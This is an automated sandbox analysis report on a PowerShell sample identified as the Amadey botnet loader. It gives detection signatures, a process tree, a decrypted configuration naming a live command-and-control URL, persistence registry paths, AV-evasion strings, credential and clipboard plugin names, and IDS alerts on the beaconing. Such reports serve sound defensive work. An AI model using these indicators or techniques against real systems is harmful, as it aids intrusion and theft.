Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nYT1CaXH9N.ps1

Overview

General Information

Sample name:nYT1CaXH9N.ps1
renamed because original name is a hash value
Original sample name:ab733235a722c734fb8f19160825cef1.ps1
Analysis ID:1585766
MD5:ab733235a722c734fb8f19160825cef1
SHA1:162b73031c52d7356337479488d60c333f404fdd
SHA256:32e6d8538c6b1d47942918cef259a80e70f06feb0145d6e41d44ec5917435391
Tags:Amadeyps1user-abuse_ch
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Injects a PE file into a foreign processes
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 3180 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 1436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 3808 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6544" "2596" "2480" "2600" "0" "0" "2604" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "176.113.115.131/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "adf0485ca6", "Install File": "Gxtuum.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
    00000000.00000002.1864550591.00000296DBC33000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      decrypted.memstrJoeSecurity_Amadey_4Yara detected AmadeyJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.2.RegSvcs.exe.400000.0.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          3.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            0.2.powershell.exe.296dbc78c18.5.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
              0.2.powershell.exe.296dbc78c18.5.raw.unpackJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security

                Sigma Signatures

                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", ProcessId: 6544, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\nYT1CaXH9N.ps1", ProcessId: 6544, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T08:42:16.679476+010028561471A Network Trojan was detected192.168.2.449748176.113.115.13180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T08:42:05.045163+010028561481A Network Trojan was detected192.168.2.449737176.113.115.13180TCP
                2025-01-08T08:42:09.575045+010028561481A Network Trojan was detected192.168.2.449740176.113.115.13180TCP
                2025-01-08T08:42:14.191636+010028561481A Network Trojan was detected192.168.2.449745176.113.115.13180TCP
                2025-01-08T08:42:18.914485+010028561481A Network Trojan was detected192.168.2.449749176.113.115.13180TCP
                2025-01-08T08:42:23.498611+010028561481A Network Trojan was detected192.168.2.449751176.113.115.13180TCP
                2025-01-08T08:42:28.049493+010028561481A Network Trojan was detected192.168.2.449753176.113.115.13180TCP
                2025-01-08T08:42:32.618665+010028561481A Network Trojan was detected192.168.2.449755176.113.115.13180TCP
                2025-01-08T08:42:37.175436+010028561481A Network Trojan was detected192.168.2.449757176.113.115.13180TCP
                2025-01-08T08:42:41.763864+010028561481A Network Trojan was detected192.168.2.449759176.113.115.13180TCP
                2025-01-08T08:42:46.302886+010028561481A Network Trojan was detected192.168.2.455811176.113.115.13180TCP
                2025-01-08T08:42:50.835270+010028561481A Network Trojan was detected192.168.2.455813176.113.115.13180TCP
                2025-01-08T08:42:55.381034+010028561481A Network Trojan was detected192.168.2.455815176.113.115.13180TCP
                2025-01-08T08:43:00.109511+010028561481A Network Trojan was detected192.168.2.455838176.113.115.13180TCP
                2025-01-08T08:43:04.628949+010028561481A Network Trojan was detected192.168.2.455869176.113.115.13180TCP
                2025-01-08T08:43:09.181141+010028561481A Network Trojan was detected192.168.2.455897176.113.115.13180TCP
                2025-01-08T08:43:13.708822+010028561481A Network Trojan was detected192.168.2.455929176.113.115.13180TCP
                2025-01-08T08:43:18.273842+010028561481A Network Trojan was detected192.168.2.455961176.113.115.13180TCP
                2025-01-08T08:43:22.831688+010028561481A Network Trojan was detected192.168.2.455988176.113.115.13180TCP
                2025-01-08T08:43:27.388773+010028561481A Network Trojan was detected192.168.2.456020176.113.115.13180TCP
                2025-01-08T08:43:31.919921+010028561481A Network Trojan was detected192.168.2.456051176.113.115.13180TCP
                2025-01-08T08:43:36.481428+010028561481A Network Trojan was detected192.168.2.456083176.113.115.13180TCP
                2025-01-08T08:43:41.038224+010028561481A Network Trojan was detected192.168.2.456100176.113.115.13180TCP
                2025-01-08T08:43:45.574085+010028561481A Network Trojan was detected192.168.2.456102176.113.115.13180TCP
                2025-01-08T08:43:50.102710+010028561481A Network Trojan was detected192.168.2.456104176.113.115.13180TCP
                2025-01-08T08:43:54.672605+010028561481A Network Trojan was detected192.168.2.456106176.113.115.13180TCP
                2025-01-08T08:43:59.204325+010028561481A Network Trojan was detected192.168.2.456108176.113.115.13180TCP
                2025-01-08T08:44:03.754351+010028561481A Network Trojan was detected192.168.2.456110176.113.115.13180TCP
                2025-01-08T08:44:08.335762+010028561481A Network Trojan was detected192.168.2.456112176.113.115.13180TCP
                2025-01-08T08:44:12.906479+010028561481A Network Trojan was detected192.168.2.456114176.113.115.13180TCP
                2025-01-08T08:44:17.458560+010028561481A Network Trojan was detected192.168.2.456116176.113.115.13180TCP
                2025-01-08T08:44:22.035510+010028561481A Network Trojan was detected192.168.2.456118176.113.115.13180TCP
                2025-01-08T08:44:26.596671+010028561481A Network Trojan was detected192.168.2.456120176.113.115.13180TCP
                2025-01-08T08:44:31.162499+010028561481A Network Trojan was detected192.168.2.456122176.113.115.13180TCP
                2025-01-08T08:44:35.733585+010028561481A Network Trojan was detected192.168.2.456124176.113.115.13180TCP
                2025-01-08T08:44:40.266082+010028561481A Network Trojan was detected192.168.2.456126176.113.115.13180TCP
                2025-01-08T08:44:44.828367+010028561481A Network Trojan was detected192.168.2.456128176.113.115.13180TCP
                2025-01-08T08:44:49.376427+010028561481A Network Trojan was detected192.168.2.456130176.113.115.13180TCP
                2025-01-08T08:44:53.964871+010028561481A Network Trojan was detected192.168.2.456132176.113.115.13180TCP
                2025-01-08T08:44:58.568416+010028561481A Network Trojan was detected192.168.2.456134176.113.115.13180TCP
                2025-01-08T08:45:03.143637+010028561481A Network Trojan was detected192.168.2.456136176.113.115.13180TCP
                2025-01-08T08:45:07.716156+010028561481A Network Trojan was detected192.168.2.456138176.113.115.13180TCP
                2025-01-08T08:45:12.274753+010028561481A Network Trojan was detected192.168.2.456140176.113.115.13180TCP
                2025-01-08T08:45:16.834867+010028561481A Network Trojan was detected192.168.2.456142176.113.115.13180TCP
                2025-01-08T08:45:21.394060+010028561481A Network Trojan was detected192.168.2.456144176.113.115.13180TCP
                2025-01-08T08:45:25.968264+010028561481A Network Trojan was detected192.168.2.456146176.113.115.13180TCP
                2025-01-08T08:45:30.523002+010028561481A Network Trojan was detected192.168.2.456148176.113.115.13180TCP
                2025-01-08T08:45:35.080922+010028561481A Network Trojan was detected192.168.2.456150176.113.115.13180TCP
                2025-01-08T08:45:39.706832+010028561481A Network Trojan was detected192.168.2.456152176.113.115.13180TCP
                2025-01-08T08:45:44.265261+010028561481A Network Trojan was detected192.168.2.456154176.113.115.13180TCP
                2025-01-08T08:45:48.840371+010028561481A Network Trojan was detected192.168.2.456156176.113.115.13180TCP
                2025-01-08T08:45:53.412687+010028561481A Network Trojan was detected192.168.2.456158176.113.115.13180TCP
                2025-01-08T08:45:57.976589+010028561481A Network Trojan was detected192.168.2.456160176.113.115.13180TCP
                2025-01-08T08:46:02.527470+010028561481A Network Trojan was detected192.168.2.456162176.113.115.13180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.131/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "adf0485ca6", "Install File": "Gxtuum.exe"}
                Multi AV Scanner detection for submitted file
                Source: nYT1CaXH9N.ps1Virustotal: Detection: 8%Perma Link
                Source: nYT1CaXH9N.ps1ReversingLabs: Detection: 23%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 176.113.115.131
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: /8Fvu5jh4DbS/index.php
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: S-%lu-
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: adf0485ca6
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Gxtuum.exe
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Startup
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cmd /C RMDIR /s/q
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rundll32
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Programs
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: %USERPROFILE%
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cred.dll|clip.dll|
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cred.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: clip.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: http://
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: https://
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: /quiet
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: /Plugins/
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: &unit=
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shell32.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: kernel32.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: GetNativeSystemInfo
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ProgramData\
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: AVAST Software
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Kaspersky Lab
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Panda Security
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Doctor Web
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 360TotalSecurity
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Bitdefender
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Norton
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Sophos
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Comodo
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: WinDefender
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 0123456789
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ------
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ?scr=1
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ComputerName
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: -unicode-
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: VideoID
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DefaultSettings.XResolution
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: DefaultSettings.YResolution
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ProductName
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: CurrentBuild
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rundll32.exe
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: "taskkill /f /im "
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: " && timeout 1 && del
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: && Exit"
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: " && ren
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Powershell.exe
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: -executionpolicy remotesigned -File "
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: shutdown -s -t 0
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: random
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Keyboard Layout\Preload
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000419
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000422
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000423
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 0000043f
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rundll32
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: cred.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: https://
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: clip.dll
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: && Exit"
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Startup
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: -unicode-
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Norton
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ?scr=1
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: ------
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Sophos
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: random
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000422
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: " && ren
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: /Plugins/
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000423
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: /quiet
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: &unit=
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 0000043f
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: VideoID
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Comodo
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: S-%lu-
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Programs
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: 00000419
                Source: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: http://
                Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1839941977.00000296CB9E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CCC64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1840009085.00000296CBC97000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49740 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55815 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49745 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49748 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49749 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49753 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55811 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55838 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49737 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49755 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55869 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55813 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55897 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49751 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:55988 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49759 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49757 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56108 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56104 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56102 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56112 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56126 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56142 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56130 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56116 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56100 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56150 -> 176.113.115.131:80
                Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:56154 -> 176.113.115.131:80
